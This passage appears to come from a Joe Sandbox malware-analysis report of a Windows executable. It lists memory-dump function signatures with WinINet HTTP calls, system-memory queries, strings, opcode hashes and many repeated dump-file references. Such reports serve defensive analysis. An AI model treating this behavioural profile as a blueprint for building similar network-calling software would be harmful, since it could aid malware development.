                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                                                    • API String ID: 256744135-2556327735
                                                                                                                                                                                                                                                    • Opcode ID: 0c5af81496cac43677fe6aeb42c3c2037d78f93dc812e685693d27ece28ea6c6
                                                                                                                                                                                                                                                    • Instruction ID: 7f1d0032f2da21e7a160440689b8174dbca1e3c26b915e86ae528014f486c5bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5af81496cac43677fe6aeb42c3c2037d78f93dc812e685693d27ece28ea6c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3119171300242EF9B24FE7CDC45979B3A9FB813607140239F5918B242C761ED918BA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                                                                                                    • API String ID: 2803490479-3785015651
                                                                                                                                                                                                                                                    • Opcode ID: 438c5ffd1c970a5907cf97a86b809dcac0d676b5d8a5e639772e5f15fe2fd87f
                                                                                                                                                                                                                                                    • Instruction ID: 7abb9147598b8d07e09eb5349a6ffc015deba619f99781503571bb79be7a7c58
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 438c5ffd1c970a5907cf97a86b809dcac0d676b5d8a5e639772e5f15fe2fd87f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11A172E00109FFCF209FA5DC888DEBB79FF05360B21027AF921A61E0D7719E44AA50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F13E
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80
                                                                                                                                                                                                                                                      • Part of subcall function 0008F238: std::_Xinvalid_argument.LIBCPMT ref: 0008F242
                                                                                                                                                                                                                                                    • _memmove.LIBCMT ref: 0008F190
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • invalid string position, xrefs: 0008F139
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                                                                    • API String ID: 3404309857-1799206989
                                                                                                                                                                                                                                                    • Opcode ID: 41a67d6f51596238d136b285a48fcd69bcb6d4f87ff1b86510e8bb5dc3d5c5fb
                                                                                                                                                                                                                                                    • Instruction ID: e34f59464f7b4b8e3365e63b1ef19460ab66d035598eebc97781e2565865a95b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a67d6f51596238d136b285a48fcd69bcb6d4f87ff1b86510e8bb5dc3d5c5fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA118B31700212EBDF14FE7CD8889B973A6BF653207144579F8998B242C770EA408B95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0008F35C
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
                                                                                                                                                                                                                                                      • Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80
                                                                                                                                                                                                                                                    • memmove.MSVCRT(0008EEBE,0008EEBE,C6C68B00,0008EEBE,0008EEBE,0008F15F,?,?,?,0008F1DF,?,?,?,75920440,?,-00000001), ref: 0008F392
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • invalid string position, xrefs: 0008F357
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                                                                    • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                    • Opcode ID: af0f368cc2a8e6937f0a5530ca2dcded2f569b63cf75840b3aa21670e530b46a
                                                                                                                                                                                                                                                    • Instruction ID: 3a5fc0512f4d3eedd439be250f763b229061b502e8907f3c275da440ee4c283f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af0f368cc2a8e6937f0a5530ca2dcded2f569b63cf75840b3aa21670e530b46a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47016D713006428BD724AEB888D853EB6E6FB85B11724493CE0C2C7645DB78EE4A9790
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: StrCmpCA.SHLWAPI(?), ref: 000869DF
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
                                                                                                                                                                                                                                                      • Part of subcall function 00086963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096873
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                                                    • Opcode ID: 59c41cfae56d89c27b1b636e1066575b0c4f585ebcd7d0fe826d73774409cdc5
                                                                                                                                                                                                                                                    • Instruction ID: bd563485dc098b36682048132d7e7ac50a91f1c25fb58221e54ee47bceb2d2bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59c41cfae56d89c27b1b636e1066575b0c4f585ebcd7d0fe826d73774409cdc5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6011935E00108ABCF61BB74E8479CE37E8BF14300B5502A1FDA4E7257EB25E9099BD2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                                                                    • String ID: {flat}
                                                                                                                                                                                                                                                    • API String ID: 1333004437-2606204563
                                                                                                                                                                                                                                                    • Opcode ID: c13179d490690034dd7661ae56d412ee22a872a2de443cf778684e5a91c80265
                                                                                                                                                                                                                                                    • Instruction ID: 59c9c54523334e45aa4f78f9c933b10d360959f8f1b73e1cdb1aed0d9390425b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c13179d490690034dd7661ae56d412ee22a872a2de443cf778684e5a91c80265
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59F0A9311802499FDF10DF58E845BF83BA0AB41755F188086FA8C4F296C770E941EBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 587104284-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 2e3aaa581628b3924a4d640209feb6f687098bd7450d8f199290561589365022
                                                                                                                                                                                                                                                    • Instruction ID: 0644f32f697b8327f22f6dc7da330a8042b49a0511ae54f0c00df2718edfdb4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e3aaa581628b3924a4d640209feb6f687098bd7450d8f199290561589365022
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89E0BFF0950208ABDB40EFA4DD46B9DB7B8AB08744F500125AA05E7282E674BA099755